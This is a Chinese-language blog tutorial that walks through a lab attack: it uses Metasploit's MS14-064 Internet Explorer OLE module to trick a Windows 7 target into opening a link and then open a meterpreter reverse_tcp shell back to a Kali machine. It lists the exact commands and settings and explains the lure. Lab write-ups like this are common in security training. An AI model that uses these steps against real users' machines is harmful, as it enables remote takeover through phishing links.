怎么植入后门程序?网络安全实战

编程入门 行业动态 更新时间:2024-10-22 20:37:21

怎么植入后门程序?<a href=https://www.elefans.com/category/jswz/34/1769606.html style=网络安全实战"/>

怎么植入后门程序?网络安全实战

在 VMware 上建立两个虚拟机:win7 和 kali。

Kali:它是 Linux 发行版的操作系统,它拥有超过 300 个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了 600 多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统。

靶机:Win7 64位 (IP: 192.168.10.45)–用 ipconfig 进行查询。

攻击机:Kali (IP:192.168.10.21)–用 ifconfig 进行查询。

1、实验环境前提条件
win7 中,关闭防火墙(“打开网络和共享中心”-“Windows 防火墙”-“打开或关闭 Windows 防火墙”-均选择关闭选项)。

保证两个虚拟机是可以 ping 通的(尤其是在 kali 中去 ping win7,看能否连通)。$ping 192.168.10.45

2、打开 Metasploit 渗透工具
Metasploit 是一款开源的安全漏洞检测工具,msfconsole 用于启动 msf 终端:

>msfconsole

复制代码

结果: 成功进入,进入到"msf6>“的模式下

3、查看需要利用的漏洞
搜索漏洞,编号为 MS14-064。

MS14-064 为 Windows OLE 自动化阵列远程代码执行漏洞。当 IE 不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用 IE 浏览器查看该网站时允许远程执行代码。

【补充:Windows 系统漏洞微软的漏洞编号命名格式为:MS14-064;

MS Micosoft 的缩写,固定格式;14 表示年份,即 2014 年发布的漏洞;064 表示顺序,即当年度发布的第 64 个漏洞。

>search ms14-064

复制代码

结果: 可以看到返回了多条可利用的漏洞模块信息

4、尝试利用其中一个漏洞模块进行攻击
利用其中一个漏洞攻击模块-0 模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)。

use exploit/windows/browser/ms14_064_ole_code_execution

复制代码

结果: 成功切换到这个模块之下–”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”–没有配置 payload,默认为 windows/meterpreter/reverse_tcp

5、查看该漏洞模块所需的参数情况
进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。

show options

复制代码

结果: 其中 required 显示的值为 yes 的,代表是必须要设置的项;显示的值为 no 的,代表是不必须要设置的项;

重点关注 6 个参数配置,需要设置哪个就设置哪个:

Payload (攻击载体-使用默认的 windows/meterpreter/reverse_tcp 即可) ;
SRVHOST (文件共享服务器-kali 地址);
SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);
LHOST (发起攻击的地址-kali 地址);
LPORT (发起攻击的端口-使用默认获取的端口即可);
AllowPowershellPrompt (开启浏览器插件,默认为 false)


【补充说明:

1)Payload 中包含有需要在远程系统中运行的恶意代码,Payload 是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了 Payload 在目标系统中的行为。

2)Payload 模块主要有以下三种类型:-Single -Stager -Stage

Single 是一种完全独立的 Payload,实现的目的也简单,但容易被捕捉到。
Stager 这种 Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的 Stagers Payload 就是 reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接(3 次握手-4 次挥手)(是一个基于 TCP 的反向链接反弹 shell, 使用起来很稳定)。
Stage 是 Stager Payload 下载的一种 Payload 组件,这种 Payload 可以提供更加高级的功能,而且没有大小限制。

3)windows/x64/meterpreter/reverse_tcp 则由一个 Stager Payload(reverse_tcp)和一个 Stage Payload(meterpreter)组成。

注意:Payload 为 windows/meterpreter/reverse_tcp 默认获取到的控制通道 meterpreter 为 32 位,

如果想将之后获取到的控制通道 meterpreter 改为 64 位,则设置。payload:windows/x64/meterpreter/reverse_tcp

6、设置文件共享服务器
发现 SRVHOST 为空,待设置,其它(payload/SRVPORT/LHOST/LPORT)均已获取,且正确,设置 SRVHOST 的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?

分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个网址,诱导用户点击了,就会直接连接到发起攻击的主机上。那你们觉得应该是谁生成这个连接呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个网站链接吧。

所以,我们才会对这个文件共享服务器的地址设置为 kali 的地址

>set SRVHOST 192.168.10.21

复制代码

7、开启浏览器插件
要把 AllowPowershellPrompt 的默认参数 false 改为 true,因为 msf 中自带的漏洞是利用 exp 调用的是 powershell(powershell 是一种命令外壳程序和脚本环境),所以 msf 的 exp 代码只对安装了 powershell 的系统生效。

>set AllowPowershellPrompt true

复制代码

8、再次进行检查
查看对 SRVHOST 和 AllowPowershellPrompt 进行的修改,是否修改成功

>show options

复制代码

9、检查无误后,发起攻击

>run

复制代码

结果: 生成一个网站的链接“Using URL : http://192.168.10.21:8080/xE6RxjSy,开启服务,光标停留在这,等待有人点击该网站链接。

10、打开网站链接
到 win7 中,在 IE 浏览器中打开网站链接: http://192.168.10.21:8080/xE6RxjSy,会提示是否允许打开一个文件,选择“允许”之后,即可触发会话连接。

结果 1: 在 win7 中打开链接后,不会有任何的反馈结果。

结果 2: 由于在 win7 中触发打开了网址链接,那么,在 kali 中,则会触发会话连接,结果显示了是 192.168.10.45(目标主机 win7)尝试点击了该网站链接,于是,kali 利用 MS14-064 漏洞模块对目标主机发起了攻击,最终,“meterpreter session 1 opened”–表明已经开通 192.168.10.21:4444 和 192.168.10.45:49191 会话连接 1。

一般会自动进入控制通道 meterpreter,交互模式,表明攻击成功。

网络安全学习资料
如果你对网络安全入门感兴趣,只要你给我的文章点赞我就可以把我整理的黑客学习大礼包免费分享给你们。


vx扫描下方二维码领取哦~

更多推荐

怎么植入后门程序?网络安全实战

本文发布于:2023-12-08 00:29:44,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1672100.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:网络安全   后门   实战   程序

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!